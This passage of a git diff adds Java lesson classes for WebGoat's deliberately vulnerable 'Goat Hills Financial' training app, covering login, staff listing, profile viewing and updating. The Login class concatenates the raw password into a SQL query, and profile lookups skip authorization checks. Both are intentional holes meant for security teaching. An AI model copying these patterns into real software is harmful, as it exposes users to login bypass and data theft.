+		//System.out.println("GoatHillsFinancial.handleRequest() dispatching to: " + action.getActionName());
+		if (action.requiresAuthentication())
+		{
+		    if (action.isAuthenticated(s))
+		    {
+			action.handleRequest(s);
+		    }
+		    else
+			throw new UnauthenticatedException();
+		}
+		else
+		{
+		    // Access to Login does not require authentication.
+		    action.handleRequest(s);
+		}
+	    }
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    System.out.println("Missing parameter");
+	    pnfe.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+	catch (ValidationException ve)
+	{
+	    System.out.println("Validation failed");
+	    ve.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+	catch (UnauthenticatedException ue)
+	{
+	    s.setMessage("Login failed");
+	    System.out.println("Authentication failure");
+	    ue.printStackTrace();
+	}
+	catch (UnauthorizedException ue2)
+	{
+	    s.setMessage("You are not authorized to perform this function");
+	    System.out.println("Authorization failure");
+	    setCurrentAction(s, ERROR_ACTION);
+	    ue2.printStackTrace();
+	}
+	catch (Exception e)
+	{
+	    // All other errors send the user to the generic error page
+	    System.out.println("handleRequest() error");
+	    e.printStackTrace();
+	    setCurrentAction(s, ERROR_ACTION);
+	}
+
+	// All this does for this lesson is ensure that a non-null content exists.
+	setContent(new ElementContainer());
+    }
+
+    public boolean isAuthorized(WebSession s, int userId, String functionId)
+    {
+	//System.out.println("Checking authorization from " + getCurrentAction(s));
+	LessonAction action = getAction(getCurrentAction(s));
+	return action.isAuthorized(s, userId, functionId);
+    }
+
+    public int getUserId(WebSession s) throws ParameterNotFoundException
+    {
+	LessonAction action = getAction(getCurrentAction(s));
+	return action.getUserId(s);
+    }
+
+    public String getUserName(WebSession s) throws ParameterNotFoundException
+    {
+	LessonAction action = getAction(getCurrentAction(s));
+	return action.getUserName(s);
+    }
+
+    protected String getJspPath() {
+    	return "/lessons/" + getLessonName() + "/";
+    }
+    
+    public String getTemplatePage(WebSession s)
+    {
+	return getJspPath() + getLessonName() + ".jsp";
+    }
+
+    public String getPage(WebSession s)
+    {
+	String page = getJspPath() + getCurrentAction(s) + ".jsp";
+
+	return page;
+    }
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+    public String getTitle()
+    {
+	return "Goat Hills Financials";
+    }
+
+    public String getSourceFileName()
+    {
+	// FIXME: Need to generalize findSourceResource() and use it on the currently active 
+	// LessonAction delegate to get its source file.
+	//return findSourceResource(getCurrentLessonScreen()....);
+	return super.getSourceFileName();
+    }
+    
+    @Override
+	protected boolean getDefaultHidden() {
+		return getClass().equals(GoatHillsFinancial.class);
+	}
+
+	public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+
+	@Override
+	protected String getLessonName() {
+		String className = getClass().getName();
+		int index = className.lastIndexOf('.');
+		if (index > -1)
+			return className.substring(index+1);
+		return super.getLessonName();
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
new file mode 100644
index 000000000..8bcf4baa8
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/LessonAction.java
@@ -0,0 +1,27 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+public interface LessonAction
+{
+	public void handleRequest(WebSession s)
+			throws ParameterNotFoundException, UnauthenticatedException, UnauthorizedException, ValidationException;
+	
+	public String getNextPage(WebSession s);
+	
+	public String getActionName();
+
+	public boolean requiresAuthentication();
+	
+	public boolean isAuthenticated(WebSession s);
+	
+	public boolean isAuthorized(WebSession s, int employeeId, String functionId);
+	
+	public int getUserId(WebSession s) throws ParameterNotFoundException;
+	
+	public String getUserName(WebSession s) throws ParameterNotFoundException;
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
new file mode 100755
index 000000000..efee3ef10
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ListStaff.java
@@ -0,0 +1,121 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import java.util.Vector;
+
+import org.owasp.webgoat.session.EmployeeStub;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ListStaff extends DefaultLessonAction
+{
+
+    public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.USER_ID);
+
+	    List<EmployeeStub> employees = getAllEmployees(s, userId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.LISTSTAFF_ACTION;
+    }
+
+    public List<EmployeeStub> getAllEmployees(WebSession s, int userId)
+	    throws UnauthorizedException
+    {
+	// Query the database for all employees "owned" by the given employee
+
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in "
+		    + "(SELECT employee_id FROM ownership WHERE employer_id = "
+		    + userId + ")";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    //System.out.println("Retrieving employee stub for role " + role);
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
new file mode 100755
index 000000000..d2ef4508d
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Login.java
@@ -0,0 +1,219 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.List;
+import java.util.Vector;
+
+import org.owasp.webgoat.session.EmployeeStub;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Login extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public Login(GoatHillsFinancial lesson, String lessonName, String actionName,
+	    LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    ValidationException
+    {
+	//System.out.println("Login.handleRequest()");
+	getLesson().setCurrentAction(s, getActionName());
+
+	List employees = getAllEmployees(s);
+	setSessionAttribute(s, getLessonName() + "."
+		+ GoatHillsFinancial.STAFF_ATTRIBUTE_KEY, employees);
+
+	int employeeId = -1;
+	try
+	{
+	    employeeId = s.getParser().getIntParameter(
+		    GoatHillsFinancial.EMPLOYEE_ID);
+	    String password = s.getParser().getStringParameter(
+		    GoatHillsFinancial.PASSWORD);
+
+	    // Attempt authentication
+	    if (login(s, employeeId, password))
+	    {
+		// Execute the chained Action if authentication succeeded.
+		try
+		{
+		    chainedAction.handleRequest(s);
+		}
+		catch (UnauthenticatedException ue1)
+		{
+		    System.out.println("Internal server error");
+		    ue1.printStackTrace();
+		}
+		catch (UnauthorizedException ue2)
+		{
+		    System.out.println("Internal server error");
+		    ue2.printStackTrace();
+		}
+	    }
+	    else
+		s.setMessage("Login failed");
+	}
+	catch (ParameterNotFoundException pnfe)
+	{
+	    // No credentials offered, so we log them out
+	    setSessionAttribute(s, getLessonName() + ".isAuthenticated",
+		    Boolean.FALSE);
+	}
+    }
+
+
+    /**
+     * After this.handleRequest() is called, when the View asks for the current JSP to load,
+     * it will get one initialized by this call.
+     */
+    public String getNextPage(WebSession s)
+    {
+	String nextPage = GoatHillsFinancial.LOGIN_ACTION;
+
+	if (isAuthenticated(s))
+	    nextPage = chainedAction.getNextPage(s);
+
+	return nextPage;
+
+    }
+
+
+    public boolean requiresAuthentication()
+    {
+	return false;
+    }
+
+
+    public boolean login(WebSession s, int userId, String password)
+    {
+	//System.out.println("Logging in to lesson");
+	boolean authenticated = false;
+
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = " + userId
+		    + " and password = '" + password + "'";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.first())
+		{
+		    setSessionAttribute(s,
+			    getLessonName() + ".isAuthenticated", Boolean.TRUE);
+		    setSessionAttribute(s, getLessonName() + "."
+			    + GoatHillsFinancial.USER_ID, Integer
+			    .toString(userId));
+		    authenticated = true;
+		}
+
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error logging in");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error logging in");
+	    e.printStackTrace();
+	}
+
+	//System.out.println("Lesson login result: " + authenticated);
+	return authenticated;
+    }
+
+
+    public List<EmployeeStub> getAllEmployees(WebSession s)
+    {
+	List<EmployeeStub> employees = new Vector<EmployeeStub>();
+
+	// Query the database for all roles the given employee belongs to
+	// Query the database for all employees "owned" by these roles
+
+	try
+	{
+	    String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles "
+		    + "where employee.userid=roles.userid";
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		answer_results.beforeFirst();
+		while (answer_results.next())
+		{
+		    int employeeId = answer_results.getInt("userid");
+		    String firstName = answer_results.getString("first_name");
+		    String lastName = answer_results.getString("last_name");
+		    String role = answer_results.getString("role");
+		    EmployeeStub stub = new EmployeeStub(employeeId, firstName,
+			    lastName, role);
+		    employees.add(stub);
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error getting employees");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error getting employees");
+	    e.printStackTrace();
+	}
+
+	return employees;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
new file mode 100755
index 000000000..c02c3cef6
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/Logout.java
@@ -0,0 +1,84 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class Logout extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+
+    public Logout(GoatHillsFinancial lesson, String lessonName, String actionName,
+	    LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    ValidationException
+    {
+	//System.out.println("Logging out");
+
+	setSessionAttribute(s, getLessonName() + ".isAuthenticated",
+		Boolean.FALSE);
+
+	// FIXME: Maybe we should forward to Login.
+	try
+	{
+	    chainedAction.handleRequest(s);
+	}
+	catch (UnauthenticatedException ue1)
+	{
+	    System.out.println("Internal server error");
+	    ue1.printStackTrace();
+	}
+	catch (UnauthorizedException ue2)
+	{
+	    System.out.println("Internal server error");
+	    ue2.printStackTrace();
+	}
+
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return chainedAction.getNextPage(s);
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
new file mode 100755
index 000000000..7113b4c76
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/SearchStaff.java
@@ -0,0 +1,49 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class SearchStaff extends DefaultLessonAction
+{
+
+    public SearchStaff(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.SEARCHSTAFF_ACTION;
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
new file mode 100755
index 000000000..487ef3180
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/UpdateProfile.java
@@ -0,0 +1,247 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.ValidationException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class UpdateProfile extends DefaultLessonAction
+{
+
+    private LessonAction chainedAction;
+
+    public UpdateProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName, LessonAction chainedAction)
+    {
+	super(lesson, lessonName, actionName);
+	this.chainedAction = chainedAction;
+    }
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException,
+	    ValidationException
+    {
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.USER_ID);
+
+	    int subjectId = s.getParser().getIntParameter(
+		    GoatHillsFinancial.EMPLOYEE_ID, 0);
+
+	    String firstName = s.getParser().getStringParameter(
+		    GoatHillsFinancial.FIRST_NAME);
+	    String lastName = s.getParser().getStringParameter(
+		    GoatHillsFinancial.LAST_NAME);
+	    String ssn = s.getParser().getStringParameter(
+		    GoatHillsFinancial.SSN);
+	    String title = s.getParser().getStringParameter(
+		    GoatHillsFinancial.TITLE);
+	    String phone = s.getParser().getStringParameter(
+		    GoatHillsFinancial.PHONE_NUMBER);
+	    String address1 = s.getParser().getStringParameter(
+		    GoatHillsFinancial.ADDRESS1);
+	    String address2 = s.getParser().getStringParameter(
+		    GoatHillsFinancial.ADDRESS2);
+	    int manager = s.getParser().getIntParameter(
+		    GoatHillsFinancial.MANAGER);
+	    String startDate = s.getParser().getStringParameter(
+		    GoatHillsFinancial.START_DATE);
+	    int salary = s.getParser().getIntParameter(
+		    GoatHillsFinancial.SALARY);
+	    String ccn = s.getParser().getStringParameter(
+		    GoatHillsFinancial.CCN);
+	    int ccnLimit = s.getParser().getIntParameter(
+		    GoatHillsFinancial.CCN_LIMIT);
+	    String disciplinaryActionDate = s.getParser().getStringParameter(
+		    GoatHillsFinancial.DISCIPLINARY_DATE);
+	    String disciplinaryActionNotes = s.getParser().getStringParameter(
+		    GoatHillsFinancial.DISCIPLINARY_NOTES);
+	    String personalDescription = s.getParser().getStringParameter(
+		    GoatHillsFinancial.DESCRIPTION);
+
+	    Employee employee = new Employee(subjectId, firstName, lastName,
+		    ssn, title, phone, address1, address2, manager, startDate,
+		    salary, ccn, ccnLimit, disciplinaryActionDate,
+		    disciplinaryActionNotes, personalDescription);
+
+	    if (subjectId > 0)
+	    {
+		this.changeEmployeeProfile(s, userId, subjectId, employee);
+		setRequestAttribute(s, getLessonName() + "."
+			+ GoatHillsFinancial.EMPLOYEE_ID, Integer
+			.toString(subjectId));
+	    }
+	    else
+		this.createEmployeeProfile(s, userId, employee);
+
+	    try
+	    {
+		chainedAction.handleRequest(s);
+	    }
+	    catch (UnauthenticatedException ue1)
+	    {
+		System.out.println("Internal server error");
+		ue1.printStackTrace();
+	    }
+	    catch (UnauthorizedException ue2)
+	    {
+		System.out.println("Internal server error");
+		ue2.printStackTrace();
+	    }
+	}
+	else
+	    throw new UnauthenticatedException();
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.VIEWPROFILE_ACTION;
+    }
+
+    public void changeEmployeeProfile(WebSession s, int userId, int subjectId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+	    // Note: The password field is ONLY set by ChangePassword
+		String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?,"
+			+ " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?,"
+			+ " personal_description = ? WHERE userid = ?;";
+	    try
+	    {
+			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+
+			ps.setString(1, employee.getFirstName());
+			ps.setString(2, employee.getLastName());
+			ps.setString(3, employee.getSsn());
+			ps.setString(4, employee.getTitle());
+			ps.setString(5, employee.getPhoneNumber());
+			ps.setString(6, employee.getAddress1());
+			ps.setString(7, employee.getAddress2());
+			ps.setInt(8, employee.getManager());
+			ps.setString(9, employee.getStartDate());
+			ps.setString(10, employee.getCcn());
+			ps.setInt(11, employee.getCcnLimit());
+			ps.setString(12, employee.getPersonalDescription());
+			ps.setInt(13, subjectId);
+			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+	    e.printStackTrace();
+	}
+    }
+
+    private int getNextUID(WebSession s)
+    {
+	int uid = -1;
+	try
+	{
+	    Statement statement = WebSession.getConnection(s).createStatement(
+		    ResultSet.TYPE_SCROLL_INSENSITIVE,
+		    ResultSet.CONCUR_READ_ONLY);
+	    ResultSet results = statement
+		    .executeQuery("select max(userid) as uid from employee");
+	    results.first();
+	    uid = results.getInt("uid");
+	}
+	catch (SQLException sqle)
+	{
+	    sqle.printStackTrace();
+	    s.setMessage("Error updating employee profile");
+	}
+	catch (ClassNotFoundException e)
+	{
+	    // TODO Auto-generated catch block
+	    e.printStackTrace();
+	}
+	return uid + 1;
+    }
+
+    public void createEmployeeProfile(WebSession s, int userId,
+	    Employee employee) throws UnauthorizedException
+    {
+	try
+	{
+			int nextId = getNextUID(s);
+		    String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)";
+
+	    try
+	    {
+    			PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query);
+
+    			ps.setString(1, employee.getFirstName().toLowerCase());
+    			ps.setString(2, employee.getLastName());
+    			ps.setString(3, employee.getSsn());
+    			ps.setString(4, employee.getTitle());
+    			ps.setString(5, employee.getPhoneNumber());
+    			ps.setString(6, employee.getAddress1());
+    			ps.setString(7, employee.getAddress2());
+    			ps.setInt(8, employee.getManager());
+    			ps.setString(9, employee.getStartDate());
+    			ps.setString(10, employee.getCcn());
+    			ps.setInt(11, employee.getCcnLimit());
+    			ps.setString(12, employee.getDisciplinaryActionDate());
+    			ps.setString(13, employee.getDisciplinaryActionNotes());
+    			ps.setString(14, employee.getPersonalDescription());
+
+    			ps.execute();
+	    }
+	    catch (SQLException sqle)
+	    {
+		s.setMessage("Error updating employee profile");
+		sqle.printStackTrace();
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error updating employee profile");
+    	    e.printStackTrace();
+	}
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
new file mode 100755
index 000000000..baae6aa7a
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java
@@ -0,0 +1,146 @@
+package org.owasp.webgoat.lessons.GoatHillsFinancial;
+
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+
+import org.owasp.webgoat.session.Employee;
+import org.owasp.webgoat.session.ParameterNotFoundException;
+import org.owasp.webgoat.session.UnauthenticatedException;
+import org.owasp.webgoat.session.UnauthorizedException;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class ViewProfile extends DefaultLessonAction
+{
+
+    public ViewProfile(GoatHillsFinancial lesson, String lessonName,
+	    String actionName)
+    {
+	super(lesson, lessonName, actionName);
+    }
+
+
+    public void handleRequest(WebSession s) throws ParameterNotFoundException,
+	    UnauthenticatedException, UnauthorizedException
+    {
+	getLesson().setCurrentAction(s, getActionName());
+
+	if (isAuthenticated(s))
+	{
+	    int userId = getIntSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.USER_ID);
+	    int employeeId = -1;
+	    try
+	    {
+		// User selected employee
+		employeeId = s.getParser().getIntParameter(
+			GoatHillsFinancial.EMPLOYEE_ID);
+	    }
+	    catch (ParameterNotFoundException e)
+	    {
+		// May be an internally selected employee
+		employeeId = getIntRequestAttribute(s, getLessonName() + "."
+			+ GoatHillsFinancial.EMPLOYEE_ID);
+	    }
+
+	    Employee employee = getEmployeeProfile(s, userId, employeeId);
+	    setSessionAttribute(s, getLessonName() + "."
+		    + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee);
+	}
+	else
+	    throw new UnauthenticatedException();
+
+    }
+
+    public String getNextPage(WebSession s)
+    {
+	return GoatHillsFinancial.VIEWPROFILE_ACTION;
+    }
+
+
+    protected Employee getEmployeeProfile(WebSession s, int userId,
+	    int subjectUserId) throws UnauthorizedException
+    {
+	Employee profile = null;
+
+	// Query the database for the profile data of the given employee
+	try
+	{
+	    String query = "SELECT * FROM employee WHERE userid = "
+		    + subjectUserId;
+
+	    try
+	    {
+		Statement answer_statement = WebSession.getConnection(s)
+			.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+				ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(query);
+		if (answer_results.next())
+		{
+		    // Note: Do NOT get the password field.
